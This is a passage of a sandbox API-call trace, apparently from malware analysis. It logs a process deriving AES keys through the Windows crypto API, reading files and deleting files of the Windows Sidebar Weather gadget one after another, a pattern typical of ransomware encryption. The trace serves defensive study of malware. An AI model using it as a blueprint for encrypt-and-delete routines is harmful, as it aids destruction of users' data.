lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.769] CryptDestroyHash (hHash=0x284d668) returned 1 [0193.769] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.769] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.771] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js")) returned 0 [0193.815] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.815] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.815] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.816] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.816] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x210ca [0193.816] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.843] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.843] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.843] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.844] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js")) returned 0 [0193.845] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.845] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.845] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.845] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0193.845] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20be [0193.845] ReadFile (in: hFile=0x5c0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.874] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0193.874] CryptDestroyKey (hKey=0x284d668) returned 1 [0193.874] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.875] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html")) returned 0 [0193.876] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.876] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.876] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0193.877] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f3e [0193.877] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.882] CryptDestroyHash (hHash=0x284d528) returned 1 [0193.882] CryptDestroyKey (hKey=0x284d668) returned 1 [0193.882] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.883] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html")) returned 0 [0193.884] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0193.884] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0193.884] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.884] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0193.884] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32a0 [0193.884] ReadFile (in: hFile=0x5b0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0193.888] CryptDestroyHash (hHash=0x284d568) returned 1 [0193.888] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0193.888] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.889] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\icon.png")) returned 0 [0193.891] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.892] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.893] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.893] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.893] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0193.893] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0193.893] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.902] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0193.902] CryptDestroyKey (hKey=0x284d568) returned 1 [0193.902] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.904] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png")) returned 0 [0193.905] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.905] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.905] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.905] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0193.905] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0193.905] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.908] CryptDestroyHash (hHash=0x284d528) returned 1 [0193.908] CryptDestroyKey (hKey=0x284d568) returned 1 [0193.908] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.912] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png")) returned 0 [0193.912] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.913] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.913] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.913] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0193.913] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0193.913] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.917] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0193.917] CryptDestroyKey (hKey=0x284d568) returned 1 [0193.917] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.938] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png")) returned 0 [0193.938] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.939] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0193.939] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0193.939] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.942] CryptDestroyHash (hHash=0x284d528) returned 1 [0193.942] CryptDestroyKey (hKey=0x284d568) returned 1 [0193.942] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.943] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png")) returned 0 [0193.960] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0193.961] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.962] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.962] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.962] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.962] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x28c [0193.962] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.969] CryptDestroyHash (hHash=0x284d568) returned 1 [0193.969] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.969] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.970] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)alerticon.png")) returned 0 [0193.970] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.971] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.971] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.971] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.971] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ad [0193.971] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.973] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.973] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.973] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.974] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)graystateicon.png")) returned 0 [0193.975] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.975] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.975] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.975] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.976] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x22f [0193.976] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.977] CryptDestroyHash (hHash=0x284d568) returned 1 [0193.977] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.977] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.979] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)greenstateicon.png")) returned 0 [0193.980] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.980] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.980] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.980] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.980] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a8 [0193.980] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.983] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0193.983] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.983] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.984] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)notconnectedstateicon.png")) returned 0 [0193.984] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0193.985] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0193.985] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.985] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0193.985] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a8 [0193.985] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0193.987] CryptDestroyHash (hHash=0x284d568) returned 1 [0193.987] CryptDestroyKey (hKey=0x284d528) returned 1 [0193.987] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.990] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)redstateicon.png")) returned 0 [0193.991] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.991] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.991] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.991] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0193.991] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0193.991] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0193.993] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0193.993] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0193.993] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0193.995] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png")) returned 0 [0193.995] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0193.996] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0193.996] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.996] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0193.996] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0193.996] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.056] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.056] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0194.056] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.058] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png")) returned 0 [0194.059] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0194.059] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0194.060] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0194.060] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.060] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0194.060] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e1 [0194.060] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0194.078] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0194.078] CryptDestroyKey (hKey=0x284d528) returned 1 [0194.078] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.079] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)alerticon.png")) returned 0 [0194.080] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0194.081] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0194.081] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.081] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0194.081] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x242 [0194.081] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0194.083] CryptDestroyHash (hHash=0x284d568) returned 1 [0194.083] CryptDestroyKey (hKey=0x284d528) returned 1 [0194.083] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.085] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)graystateicon.png")) returned 0 [0194.085] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0194.086] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0194.086] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.086] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0194.086] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f0 [0194.086] ReadFile (in: hFile=0x5bc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0194.088] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0194.088] CryptDestroyKey (hKey=0x284d528) returned 1 [0194.088] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.090] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)greenstateicon.png")) returned 0 [0194.091] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, 